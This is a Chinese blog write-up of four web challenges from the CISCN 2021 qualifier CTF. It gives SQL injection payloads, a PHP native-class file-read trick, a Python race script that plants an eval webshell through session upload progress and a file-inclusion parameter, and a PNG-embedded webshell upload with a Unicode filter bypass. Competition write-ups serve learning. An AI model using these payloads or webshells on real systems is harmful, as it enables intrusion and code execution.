ciscn国赛初赛web(4道低分题)

最新推荐文章于 2023-05-29 18:02:55 发布
置顶 最新推荐文章于 2023-05-29 18:02:55 发布
阅读量6.8k 收藏 53
点赞数 41
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/116885083
版权

文章目录

easy_sql

经过简单尝试发现为单引号括号闭合,并且可用使用报错注入注出库名

uname=1')||extractvalue('abc',concat('~',database()))%23&passwd=1

在这里插入图片描述

接着尝试利用information_schema库注表名,但是发现information被过滤掉了
在这里插入图片描述

那么可用无列名注入
获取到第一个列名id
uname=1') ||updatexml("~",concat("~",(select * from (select * from flag as a join flag b)c)),"~")%23&passwd=1
在这里插入图片描述

获取后续列名。
在这里插入图片描述

得到flag

uname=1')||updatexml(1,((select `e4f94828-d693-4ea1-8759-051b98824ce3` from flag limit 0,1)),1)%23&passwd=1

在这里插入图片描述

easy_source

扫描后台目录得到index.php.swp
得到源码如下

<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

根据提示猜测flag就在当前页面的代码中。
尝试用php原生类,并且构造方法的参数是两个的

DirectoryIterator

FilesystemIterator

GlobIterator 

SplFileObject

从上面的和文件操作有关的类中发现SplFileObject 类符合。
在这里插入图片描述
从php官网寻找相关读文件的的方法,发现fpassthru可用,最终payload
?rc=SplFileObject&ra=index.php&rb=r&rd=fpassthru
右键查看网页源代码得到flag

middle_source

扫描后台发现.listing文件
在这里插入图片描述
访问you_can_seeeeeeee_me.php得到phpinfo信息

在这里插入图片描述

在这里插入图片描述
发现可以利用session.upload_progress进行文件包含,并且session位置可知。

import requests
import threading
import sys
session=requests.session()
sess='yu22x'
url1="http://123.60.222.134:24086/"
url2='http://123.60.222.134:24086/'
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
}
data2={
	'1':'var_dump(file_get_contents("/etc/fddeafiaah/fdcccedhae/hgefcbbiab/dhceefeafc/ejhcjafeac/fl444444g"));echo "zzx";',
	'cf':'../../../../../../var/lib/php/sessions/dafbijggda/sess_'+sess
}
file={
	'file':'abc'
}
cookies={
	'PHPSESSID': sess
}
def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.post(url2,data=data2)
		if 'zzx' in r.text:
			print(r.text)

threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

在这里插入图片描述
在这里插入图片描述

upload

扫描后台得到example.php
首先可以用下面内容绕过getimagesize

#define width 1
#define height 1

根据example.php中的代码要求,我们应该需要上传一个zip后缀的文件才可以利用
在这里插入图片描述
但是前面把i字符给过滤了。
但是我们发现在生成文件名时用了mb_strtolower()函数。
在这里插入图片描述
可以利用一些unicode字符绕过。经过测试发现

<?php
var_dump(mb_strtolower('İ')==='i');
?>

输出结果为true。
并且前面还进行了url解密。所以可以用%c4%b0代替i字符。
为了可以绕过图片检查可以用如下脚本实现
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/
修改脚本的payload部分
具体步骤如下
https://gchq.github.io/CyberChef/
在这里插入图片描述

将得到的数据在010内修改
在这里插入图片描述
修改后内容如下
在这里插入图片描述
复制出16进制
在这里插入图片描述

修改payload下面的两处内容
在这里插入图片描述

生成图片马
在这里插入图片描述

修改图片后缀为php然后压缩成zip
在这里插入图片描述
上传文件并抓包,修改文件名并添加长度绕过的字符串。
在这里插入图片描述
解压文件
在这里插入图片描述
在example目录下得到解压的文件
在这里插入图片描述
执行代码
在这里插入图片描述

yu22x
关注
  • 41
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 22
    评论
2021国赛CISCN 初赛 部分RE writeup
weixin_45803474的博客
09-14 343
glass 目名称:glass 目描述:Reverse sign in,flag形式为"CISCN{XXXXX}" 首先查看apk 界面如下 用AndroidKiller打开,反编译成java源码 这里只是声明了一下checkflag函数 要去native-lib里找 分析\glass\Project\lib\armeabi-v7a中的libnative-lib.so IDA打开 怀疑是RC4加密 参考 https://www.cnblogs.com/SunsetR/p/12247041.html
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名.docx
最新发布
04-15
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名
ciscn2018-pwn:2018大学生信息安全国赛pwn出docker
05-11
Title CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar Tool IDA, pwntools Tag backdoor
蓝桥杯C高职初赛汇总
01-22
蓝桥杯C高职初赛.rar。为促进软件和信息领域专业技术人才培养,提升高校毕业生的就业竞争力,工业和信息化部人才交流中心自 2010 年起,连续十三年举办 "蓝桥杯"全国软件和信息技术专业人才大赛,大赛每年一届,全国已超过 1600 所院校,累计 65 万余名学子报名参赛。 蓝桥杯大赛作为国内领先的全国性 IT 学习赛事,连续三年入选中国高等教育学会 "全国普通高校学科竞赛排行榜",并被江苏,四川,甘肃,辽宁等多个省份列入省级竞赛名单,持续有力支撑综合测评、奖学金评定、升学考研,是高等教育教学改革和创新人才培养的重要竞赛项目,为我国 IT 业的发展培养和选拔了大批优秀人才。
c++初赛模拟试及答案
05-13
c++初赛模拟试及答案
2021csp-j初赛及答案.docx
11-09
2021csp-j初赛及答案 全新整理
ciscn2023-web 总结与思考
m0_64348326的博客
05-29 318
1.一开始本以为是一个简单的dump界面的命令注入,因为猜测源语句可能是先执行命令读取创建日志信息,然后file_get_contents写入/log/目录中。所以一开始就在读取的table_2_dump参数中进行fuzz,发现很多能用来执行命令的符号,例如反引号、$、|、;均被过滤了,不过尝试换行符成功了,于是尝试执行env成功在环境变量中找到了flag。2.赛后才知这是非预期解,预期是。官方文档中说明了这是一个备份程序,在shell中可以执行备份操作,安装的mysqldump就是链接到该程序中的。
2023 ciscn web部分
GXcodes的博客
05-28 877
软链接参考文章构造payload:先构造一个指向/var/www/html的软连接(因为html目录下是web环境,为了后续可以getshell)。利用命令(zip --symlinks test.zip ./*)对test文件进行压缩。此时上传该test.zip解压出里边的文件也是软连接/var/www/html目录下接下来的思路就是想办法构造一个gethsell文件让gethsell文件正好解压在/var/www/html 此时就可以getshell。
CISCNweb篇)命令执行
cxiaodi的博客
05-05 662
ctf命令执行专
2021全国大学生信息安全大赛[CISCN]web部分复现
1ance's blog
05-18 1395
目录Webeasysqleasy_source Web easysql 太菜了。。一注入搞了半天也没整出来离谱的很。。 先是想着sqlmap跑一下,结果发现是sqllabs的数据库,发现flag表,心中暗想不会吧不会吧这就出来了??接下去,才发现是我太年轻了。flag表里啥就一个id字段,其他的啥也没跑出来,离谱啊。。 只能手工测测了。发现有报错注入,但是information被过滤了,查不了列名,然后想着用时间盲注,跑出列名,最后跑出来flag(那一刻是超爽)。。。。但是提交错误(心态炸裂),然后开始检
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 736
前言 6.5号去了兰州打了分区赛,4Web出了web1和web4,web2和web3都不会。这flask是web3,讲理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
[CISCN2021 Quals]upload(PNG-IDAT块嵌入马)
paidx0
09-17 433
[CISCN2021 Quals]upload(PNG-IDAT块嵌入马)
计算机技能大赛初赛及答案.doc
11-28
计算机技能大赛初赛及答案.doc
初赛呃呃呃呃呃呃呃
09-13
初赛呃呃呃呃呃呃呃
网络安全web方向入门合集
dra_p0p3n's blogs
08-15 3628
这是我大三在实习的时候做的一些目,以后准备搞人工智能方向,应该也不会再接触网安了,就在这里汇总一下之前做的简单吧,虽然简单但是也用了很多功夫去写这些,提高也很大,以此留作纪念吧。
UNCTF2020web方向部分
bmth666的博客
11-18 1609
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的目的一些思路:checkin-sql:easyphp: Web方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
自己做web的文章整合(后续应该还会在更)
BvxiE的博客
08-14 367
首先了解一下Easy Calc的意思:嗯…没啥用!
ciscn2021-easy-sql无列名注入
soldi_er的博客
05-17 510
文章目录   登陆框。前端代码无信息。   部分黑名单字符:Union、Information、Sys、nno、column。   学到的东西: (1)Union的绕过,虽然比赛中绕不过去,但可以拓展绕过知识。 (2)查表的一些视图。 (3)无列名注入,通过表名可以查列名,无需union关键字。   前期报错注入,可以查到数据库名。 测试1:uname=1&passwd='。发现是MariaDB。 You have an error in your SQL syntax; check the ma
[CISCN 2019华东南]Web11
qq_64222098的博客
04-15 164
它相比较于{php}{/php}不同的是添加了一些特性。每个{if}必须有配对的{/if},也可以用{else}和{else if},所有的php条件表达式和函数都可以在if内使用,比如||,or,and,&等。看了一下,没有直接给参数让我们来传。但是发现是一个a simp ip address api,猜测可能ip是参数,试一下。在这上,我们就可以用{if}标签。因为提示是smarty,于是上网查了一下资料。但是发现它被编码了,不行。发现这个地方变了,成功找到注入的地方。发现版本是3.1的。
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 22
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值